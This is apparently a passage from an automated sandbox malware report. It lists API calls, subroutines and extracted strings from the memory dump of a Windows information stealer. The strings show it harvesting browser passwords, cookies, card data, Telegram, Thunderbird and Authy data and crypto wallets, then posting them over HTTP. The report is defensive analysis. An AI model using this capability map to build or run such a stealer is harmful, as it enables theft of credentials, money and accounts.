                                                                                                                                              • Part of subcall function 004651EC: __stbuf.LIBCMT ref: 004652B7
                                                                                                                                              • Part of subcall function 004651EC: __output_l.LIBCMT ref: 004652C7
                                                                                                                                              • Part of subcall function 004651EC: __ftbuf.LIBCMT ref: 004652D1
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F1E0
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F1EE
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F1F5
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F203
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F20A
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F24D
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F267
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _fprintf$File$AllocCopyCurrentDeleteDirectoryH_prolog3H_prolog3_Local__fsopen__ftbuf__lock_file__output_l__stbuf_memsetlstrcat
                                                                                                                                            • String ID: Host: %s$Login: %s$Password: %s$Soft: %s$\temp
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0040AFE8
                                                                                                                                            • __cftof.LIBCMT ref: 0040B0AA
                                                                                                                                            • InternetOpenA.WININET(0000002F,00000000,?,00000000,00000000), ref: 0040B0C5
                                                                                                                                            • InternetSetOptionA.WININET(00000000,00000041,?,00000004), ref: 0040B0E8
                                                                                                                                            • InternetConnectA.WININET(00000000,00000000,00000050,?,?,00000003,00000000,00000001), ref: 0040B109
                                                                                                                                            • InternetSetOptionA.WININET(00000000,00000041,00000001,00000000), ref: 0040B122
                                                                                                                                            • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00400000,00000001), ref: 0040B145
                                                                                                                                            • HttpAddRequestHeadersA.WININET(00000000,?,?,20000000), ref: 0040B19F
                                                                                                                                            • __itow_s.LIBCMT ref: 0040B1B3
                                                                                                                                            • HttpAddRequestHeadersA.WININET(00000000,?,?,20000000), ref: 0040B202
                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 0040B210
                                                                                                                                            • HttpQueryInfoA.WININET(00000000,0000002E,?,00000010,00000000), ref: 0040B22D
                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0040B238
                                                                                                                                            • __cftof.LIBCMT ref: 0040B264
                                                                                                                                              • Part of subcall function 00465F9A: __mbsnbcpy_s_l.LIBCMT ref: 00465FAD
                                                                                                                                            • InternetOpenUrlA.WININET(00000010,00000000,00000000,00000000,00400000,00000000), ref: 0040B278
                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0040B28D
                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 0040B2A5
                                                                                                                                            • InternetCloseHandle.WININET(00000010), ref: 0040B2AE
                                                                                                                                              • Part of subcall function 0040A91B: __EH_prolog3.LIBCMT ref: 0040A93A
                                                                                                                                              • Part of subcall function 0040A91B: InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 0040A974
                                                                                                                                              • Part of subcall function 0040A91B: InternetReadFile.WININET(?,?,000003E8,?), ref: 0040A98E
                                                                                                                                              • Part of subcall function 0040A91B: _memmove.LIBCMT ref: 0040A9C3
                                                                                                                                              • Part of subcall function 0040A91B: _memset.LIBCMT ref: 0040A9F4
                                                                                                                                              • Part of subcall function 0040A91B: HttpQueryInfoA.WININET(?,0000001D,00000010,?,00000000), ref: 0040AA0A
                                                                                                                                              • Part of subcall function 0040A91B: CoCreateInstance.OLE32(0048C204,00000000,00000001,0048C214,?), ref: 0040AA2F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Internet$Http$CloseHandleRequest$Open$FileH_prolog3HeadersInfoOptionQuery__cftof$ConnectCreateInstancePointerReadSend__itow_s__mbsnbcpy_s_l_memmove_memset
                                                                                                                                            • String ID: --$Content-Length: $Content-Type: multipart/form-data; boundary=$POST$http$http://
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000104,?,00481870,?,?), ref: 0040F5E0
                                                                                                                                            • lstrcatA.KERNEL32(?,\temp), ref: 0040F5F2
                                                                                                                                            • CopyFileA.KERNEL32 ref: 0040F602
                                                                                                                                            • _memset.LIBCMT ref: 0040F60F
                                                                                                                                            • _sprintf.LIBCMT ref: 0040F621
                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040F790
                                                                                                                                              • Part of subcall function 0046647E: __fsopen.LIBCMT ref: 0046648B
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F6C3
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F6CA
                                                                                                                                              • Part of subcall function 004651EC: __lock_file.LIBCMT ref: 00465233
                                                                                                                                              • Part of subcall function 004651EC: __stbuf.LIBCMT ref: 004652B7
                                                                                                                                              • Part of subcall function 004651EC: __output_l.LIBCMT ref: 004652C7
                                                                                                                                              • Part of subcall function 004651EC: __ftbuf.LIBCMT ref: 004652D1
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F6D6
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F6DD
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F6EE
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F6F5
                                                                                                                                              • Part of subcall function 0040EE8C: __EH_prolog3_GS.LIBCMT ref: 0040EE93
                                                                                                                                              • Part of subcall function 0040EE8C: _memset.LIBCMT ref: 0040EEEE
                                                                                                                                              • Part of subcall function 0040EE8C: LocalAlloc.KERNEL32(00000040,?,00000000,?,?), ref: 0040EF29
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F739
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F755
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _fprintf$File_memset$AllocCopyCurrentDeleteDirectoryH_prolog3_Local__fsopen__ftbuf__lock_file__output_l__stbuf_memmove_sprintflstrcat
                                                                                                                                            • String ID: CC\%s_%s.txt$Card: $Month: $Name: $P~$Year: $\temp
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000104,?,00481870,?,?), ref: 0040F32A
                                                                                                                                            • lstrcatA.KERNEL32(?,\temp), ref: 0040F33F
                                                                                                                                            • CopyFileA.KERNEL32 ref: 0040F348
                                                                                                                                            • _memset.LIBCMT ref: 0040F358
                                                                                                                                            • lstrcatA.KERNEL32(?), ref: 0040F36D
                                                                                                                                            • lstrcatA.KERNEL32(?,00481844), ref: 0040F37B
                                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 0040F387
                                                                                                                                            • lstrcatA.KERNEL32(?,004829F4), ref: 0040F395
                                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 0040F3A1
                                                                                                                                            • lstrcatA.KERNEL32(?,.txt), ref: 0040F3AF
                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040F570
                                                                                                                                              • Part of subcall function 0046647E: __fsopen.LIBCMT ref: 0046648B
                                                                                                                                            • lstrcatA.KERNEL32(?), ref: 0040F48E
                                                                                                                                            • lstrcatA.KERNEL32(?), ref: 0040F4B8
                                                                                                                                            • lstrcatA.KERNEL32(?,004826E0), ref: 0040F4CD
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F51C
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F538
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: lstrcat$File_fprintf$CopyCurrentDeleteDirectory__fsopen_memset
                                                                                                                                            • String ID: %s%s%s%s%s%s%s$.txt$\temp$`~
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00411B32
                                                                                                                                              • Part of subcall function 0046647E: __fsopen.LIBCMT ref: 0046648B
                                                                                                                                            • __wgetenv.LIBCMT ref: 00411CCD
                                                                                                                                              • Part of subcall function 0041150B: _fprintf.LIBCMT ref: 004117F6
                                                                                                                                              • Part of subcall function 0041150B: _fprintf.LIBCMT ref: 00411806
                                                                                                                                              • Part of subcall function 0041150B: _fprintf.LIBCMT ref: 0041190B
                                                                                                                                              • Part of subcall function 0041150B: _fprintf.LIBCMT ref: 0041191E
                                                                                                                                              • Part of subcall function 0041150B: _fprintf.LIBCMT ref: 00411941
                                                                                                                                              • Part of subcall function 0041150B: _fprintf.LIBCMT ref: 00411952
                                                                                                                                              • Part of subcall function 0041150B: _fprintf.LIBCMT ref: 00411976
                                                                                                                                              • Part of subcall function 0041150B: _fprintf.LIBCMT ref: 00411982
                                                                                                                                              • Part of subcall function 0041044C: __EH_prolog3.LIBCMT ref: 0041046B
                                                                                                                                              • Part of subcall function 0041044C: _memset.LIBCMT ref: 00410495
                                                                                                                                              • Part of subcall function 0041044C: lstrcatA.KERNEL32(?,?,?,0000001C,?,?,00000014), ref: 004104B6
                                                                                                                                              • Part of subcall function 0041044C: _memset.LIBCMT ref: 004104C1
                                                                                                                                              • Part of subcall function 0041044C: lstrcatA.KERNEL32(?,?,?,?,?,?,?,00000014), ref: 004104D4
                                                                                                                                              • Part of subcall function 0041044C: lstrcatA.KERNEL32(?,00481844,?,?,?,?,?,00000014), ref: 004104E2
                                                                                                                                              • Part of subcall function 0041044C: lstrcatA.KERNEL32(?,?,?,?,?,?,00000014), ref: 004104F1
                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0041208E
                                                                                                                                            • _memset.LIBCMT ref: 004120A9
                                                                                                                                            • __wgetenv.LIBCMT ref: 00411C19
                                                                                                                                              • Part of subcall function 00465BDA: _strnlen.LIBCMT ref: 00465C0F
                                                                                                                                              • Part of subcall function 00465BDA: __lock.LIBCMT ref: 00465C20
                                                                                                                                              • Part of subcall function 00465BDA: __getenv_helper_nolock.LIBCMT ref: 00465C2D
                                                                                                                                            • __wgetenv.LIBCMT ref: 00411B74
                                                                                                                                              • Part of subcall function 004046E9: __EH_prolog3.LIBCMT ref: 004046F0
                                                                                                                                              • Part of subcall function 00403FCA: _memmove.LIBCMT ref: 00403FEC
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                              • Part of subcall function 0041150B: __EH_prolog3_catch_GS.LIBCMT ref: 00411515
                                                                                                                                            • __wgetenv.LIBCMT ref: 004120B3
                                                                                                                                            • DeleteFileA.KERNEL32(00482C44), ref: 00412151
                                                                                                                                            • DeleteFileA.KERNEL32(00482C40), ref: 00412158
                                                                                                                                              • Part of subcall function 004111EE: __EH_prolog3.LIBCMT ref: 0041120D
                                                                                                                                              • Part of subcall function 004111EE: __wgetenv.LIBCMT ref: 00411219
                                                                                                                                              • Part of subcall function 004111EE: CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?), ref: 004112C5
                                                                                                                                              • Part of subcall function 004111EE: CreateDirectoryA.KERNEL32(00000000,00000000,?,00000001,00000000,?,?,?), ref: 004112FC
                                                                                                                                              • Part of subcall function 0040B49F: _memset.LIBCMT ref: 0040B4C0
                                                                                                                                              • Part of subcall function 0040B49F: GetVersionExA.KERNEL32(?), ref: 0040B4D9
                                                                                                                                              • Part of subcall function 0040EBA8: LoadLibraryA.KERNEL32(?,00000000), ref: 0040EBD9
                                                                                                                                              • Part of subcall function 0040EBA8: GetProcAddress.KERNEL32(00000000,004940CC), ref: 0040EBFA
                                                                                                                                              • Part of subcall function 0040EBA8: GetProcAddress.KERNEL32(00000000), ref: 0040EC08
                                                                                                                                              • Part of subcall function 0040EBA8: GetProcAddress.KERNEL32(00000000), ref: 0040EC16
                                                                                                                                              • Part of subcall function 0040EBA8: GetProcAddress.KERNEL32(00000000), ref: 0040EC24
                                                                                                                                              • Part of subcall function 0040EBA8: GetProcAddress.KERNEL32(00000000), ref: 0040EC32
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _fprintf$AddressProc__wgetenv$H_prolog3_memsetlstrcat$CreateDirectory$DeleteFile_memmove$H_prolog3_catch_LibraryLoadVersion__fsopen__getenv_helper_nolock__lock_strnlen
                                                                                                                                            • String ID: *.cookie$*.txt$APPDATA$D877F783D5D3EF8C*$LOCALAPPDATA$Thunderbird$\Telegram Desktop\$\Thunderbird\Profiles\$key_datas$map*
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0040AD7B
                                                                                                                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,0000006C,00408A05,logs,?,00000001,00000000,00000001,00000000), ref: 0040AD9E
                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0040ADB2
                                                                                                                                            • CloseHandle.KERNEL32(00000001), ref: 0040ADC3
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$CloseCreateH_prolog3_HandleSize
                                                                                                                                            • String ID: "$"; filename="$.$Content-Disposition: form-data; name="$Content-Type: $gif$image/gif$image/jpeg$image/png$image/tiff$jpg$png$tiff
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_catch_GS.LIBCMT ref: 00411515
                                                                                                                                              • Part of subcall function 00408FBD: __EH_prolog3.LIBCMT ref: 00408FC4
                                                                                                                                              • Part of subcall function 0045F3B6: __EH_prolog3_GS.LIBCMT ref: 0045F3C0
                                                                                                                                              • Part of subcall function 0045F3B6: FindFirstFileW.KERNEL32(00000000,?,00000298,0041126F,?), ref: 0045F3F9
                                                                                                                                              • Part of subcall function 0045F3B6: FindNextFileW.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 0045F48A
                                                                                                                                              • Part of subcall function 0045F006: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0045F035
                                                                                                                                              • Part of subcall function 0045F006: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0045F064
                                                                                                                                              • Part of subcall function 00402B83: std::_Xinvalid_argument.LIBCPMT ref: 00402B9D
                                                                                                                                            • _fprintf.LIBCMT ref: 004117F6
                                                                                                                                            • _fprintf.LIBCMT ref: 00411806
                                                                                                                                            • _fprintf.LIBCMT ref: 00411869
                                                                                                                                            • _fprintf.LIBCMT ref: 00411879
                                                                                                                                            • _fprintf.LIBCMT ref: 004118BC
                                                                                                                                            • _fprintf.LIBCMT ref: 004118EB
                                                                                                                                            • _fprintf.LIBCMT ref: 004118FB
                                                                                                                                            • _fprintf.LIBCMT ref: 0041190B
                                                                                                                                            • _fprintf.LIBCMT ref: 0041191E
                                                                                                                                            • _fprintf.LIBCMT ref: 00411941
                                                                                                                                            • _fprintf.LIBCMT ref: 00411952
                                                                                                                                            • _fprintf.LIBCMT ref: 00411976
                                                                                                                                            • _fprintf.LIBCMT ref: 00411982
                                                                                                                                            • _fprintf.LIBCMT ref: 004119AB
                                                                                                                                            • _fprintf.LIBCMT ref: 004119BB
                                                                                                                                              • Part of subcall function 00403FCA: _memmove.LIBCMT ref: 00403FEC
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _fprintf$ByteCharFileFindMultiWide_memmove$FirstH_prolog3H_prolog3_H_prolog3_catch_NextXinvalid_argumentstd::_
                                                                                                                                            • String ID: FALSE
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 0045BDCB
                                                                                                                                              • Part of subcall function 0040E701: __EH_prolog3.LIBCMT ref: 0040E708
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?,00000001,00000000,00000000,00000003,00000001,00481714,00000000,000000CC), ref: 0045BE49
                                                                                                                                            • RegEnumKeyExA.KERNEL32(?,?,?,0000000F,00000000,00000000,00000000,00000000), ref: 0045BE96
                                                                                                                                            • wsprintfA.USER32 ref: 0045BEBD
                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020019,?), ref: 0045BED1
                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0045BEDE
                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0045BEE7
                                                                                                                                              • Part of subcall function 0040E76B: __EH_prolog3.LIBCMT ref: 0040E772
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseH_prolog3Open$EnumH_prolog3_catch_memmovewsprintf
                                                                                                                                            • String ID: %s\%s$DisplayName$DisplayVersion$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00409835
                                                                                                                                            • __wgetenv.LIBCMT ref: 00409849
                                                                                                                                              • Part of subcall function 00408FBD: __EH_prolog3.LIBCMT ref: 00408FC4
                                                                                                                                              • Part of subcall function 0045F3B6: __EH_prolog3_GS.LIBCMT ref: 0045F3C0
                                                                                                                                              • Part of subcall function 0045F3B6: FindFirstFileW.KERNEL32(00000000,?,00000298,0041126F,?), ref: 0045F3F9
                                                                                                                                              • Part of subcall function 0045F3B6: FindNextFileW.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 0045F48A
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                              • Part of subcall function 0045EBF9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0045EC2A
                                                                                                                                              • Part of subcall function 0045EBF9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 0045EC4D
                                                                                                                                              • Part of subcall function 00403FCA: _memmove.LIBCMT ref: 00403FEC
                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000), ref: 00409B48
                                                                                                                                            • CopyFileW.KERNEL32(00000000,00000000,00000001), ref: 00409C60
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$ByteCharFindH_prolog3MultiWide_memmove$CopyCreateDirectoryFirstH_prolog3_Next__wgetenv
                                                                                                                                            • String ID: LOCALAPPDATA$banlist$fee_estimates$governance$mempool$mncache$mnpayments$netfulfilled$peers
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004092DE
                                                                                                                                            • __wgetenv.LIBCMT ref: 004092F2
                                                                                                                                              • Part of subcall function 00408FBD: __EH_prolog3.LIBCMT ref: 00408FC4
                                                                                                                                              • Part of subcall function 0045F3B6: __EH_prolog3_GS.LIBCMT ref: 0045F3C0
                                                                                                                                              • Part of subcall function 0045F3B6: FindFirstFileW.KERNEL32(00000000,?,00000298,0041126F,?), ref: 0045F3F9
                                                                                                                                              • Part of subcall function 0045F3B6: FindNextFileW.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 0045F48A
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                              • Part of subcall function 0045EBF9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0045EC2A
                                                                                                                                              • Part of subcall function 0045EBF9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 0045EC4D
                                                                                                                                              • Part of subcall function 00403FCA: _memmove.LIBCMT ref: 00403FEC
                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000), ref: 004095F1
                                                                                                                                            • CopyFileW.KERNEL32(00000000,00000000,00000001), ref: 00409709
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$ByteCharFindH_prolog3MultiWide_memmove$CopyCreateDirectoryFirstH_prolog3_Next__wgetenv
                                                                                                                                            • String ID: APPDATA$banlist$fee_estimates$governance$mempool$mncache$mnpayments$netfulfilled$peers
                                                                                                                                            • API String ID: 1477989549-1297871447
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0041120D
                                                                                                                                            • __wgetenv.LIBCMT ref: 00411219
                                                                                                                                              • Part of subcall function 004046E9: __EH_prolog3.LIBCMT ref: 004046F0
                                                                                                                                              • Part of subcall function 0045F3B6: __EH_prolog3_GS.LIBCMT ref: 0045F3C0
                                                                                                                                              • Part of subcall function 0045F3B6: FindFirstFileW.KERNEL32(00000000,?,00000298,0041126F,?), ref: 0045F3F9
                                                                                                                                              • Part of subcall function 0045F3B6: FindNextFileW.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 0045F48A
                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?), ref: 004112C5
                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000001,00000000,?,?,?), ref: 004112FC
                                                                                                                                              • Part of subcall function 0045F006: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0045F035
                                                                                                                                              • Part of subcall function 0045F006: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0045F064
                                                                                                                                            • CopyFileW.KERNEL32(00000000,?,00000001), ref: 0041142B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$ByteCharCreateDirectoryFindH_prolog3MultiWide$CopyFirstH_prolog3_Next__wgetenv
                                                                                                                                            • String ID: APPDATA$\Authy Desktop\Local Storage\$\Authy Desktop\Local Storage\*.localstorage$\files\Soft$\files\Soft\Authy$files\Soft\Authy
                                                                                                                                            • API String ID: 2019322786-2614104896
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File_fprintf$CopyCurrentDeleteDirectory__fsopen_memset_sprintflstrcat
                                                                                                                                            • String ID: %s%s$Autofill\%s_%s.txt$\temp
                                                                                                                                            • API String ID: 2288810340-2986410175
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000104,?,00481870,?,?), ref: 0040BA23
                                                                                                                                            • lstrcatA.KERNEL32(?,\temp), ref: 0040BA35
                                                                                                                                            • CopyFileA.KERNEL32 ref: 0040BA45
                                                                                                                                            • _memset.LIBCMT ref: 0040BA53
                                                                                                                                            • _sprintf.LIBCMT ref: 0040BA65
                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040BB0F
                                                                                                                                              • Part of subcall function 0046647E: __fsopen.LIBCMT ref: 0046648B
                                                                                                                                            • _fprintf.LIBCMT ref: 0040BADA
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$CopyCurrentDeleteDirectory__fsopen_fprintf_memset_sprintflstrcat
                                                                                                                                            • String ID: %s$History\%s_%s.txt$SELECT url FROM urls$\temp
                                                                                                                                            • API String ID: 440339207-2199967400
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 00404113
                                                                                                                                              • Part of subcall function 0040A51C: _memset.LIBCMT ref: 0040A52A
                                                                                                                                              • Part of subcall function 0040A51C: _strcpy_s.LIBCMT ref: 0040A540
                                                                                                                                              • Part of subcall function 0040A51C: _memset.LIBCMT ref: 0040A55B
                                                                                                                                            • _memset.LIBCMT ref: 00404147
                                                                                                                                            • _memset.LIBCMT ref: 00404155
                                                                                                                                            • _strtok.LIBCMT ref: 0040417B
                                                                                                                                            • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,00000394), ref: 0040419F
                                                                                                                                            • lstrcatA.KERNEL32(?,00000000,?,00000010,?,?,?,?,?,?,?,00000394), ref: 004041C5
                                                                                                                                            • lstrcatA.KERNEL32(?,00000001,00000000,?,?,?,?,?,?,?,00000394), ref: 004041E2
                                                                                                                                            • lstrcatA.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,00000394), ref: 00404218
                                                                                                                                            • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,00000394), ref: 00404227
                                                                                                                                            • ShellExecuteA.SHELL32(00000000,00000000,?,00481714,00000000,00000000), ref: 004042D7
                                                                                                                                              • Part of subcall function 0040A5A6: _memset.LIBCMT ref: 0040A5B0
                                                                                                                                            • _strtok.LIBCMT ref: 004042F0
                                                                                                                                              • Part of subcall function 0046577D: __getptd.LIBCMT ref: 0046579B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memsetlstrcat$_strtok$ExecuteH_prolog3_Shell__getptd_strcpy_s
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 230071149-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0041086E
                                                                                                                                              • Part of subcall function 0045C174: GetUserNameA.ADVAPI32(?,?), ref: 0045C1A9
                                                                                                                                              • Part of subcall function 00410769: __EH_prolog3.LIBCMT ref: 00410770
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                              • Part of subcall function 00402B83: std::_Xinvalid_argument.LIBCPMT ref: 00402B9D
                                                                                                                                            • _fprintf.LIBCMT ref: 00410B2F
                                                                                                                                            • _fprintf.LIBCMT ref: 00410B49
                                                                                                                                            • _fprintf.LIBCMT ref: 00410B64
                                                                                                                                            • _fprintf.LIBCMT ref: 00410B7F
                                                                                                                                              • Part of subcall function 004027C0: std::_Xinvalid_argument.LIBCPMT ref: 004027D3
                                                                                                                                              • Part of subcall function 004027C0: _memmove.LIBCMT ref: 0040280E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _fprintf$Xinvalid_argument_memmovestd::_$H_prolog3H_prolog3_NameUser
                                                                                                                                            • String ID: Host: %s$Login: %s$Password: %s$passwords.txt
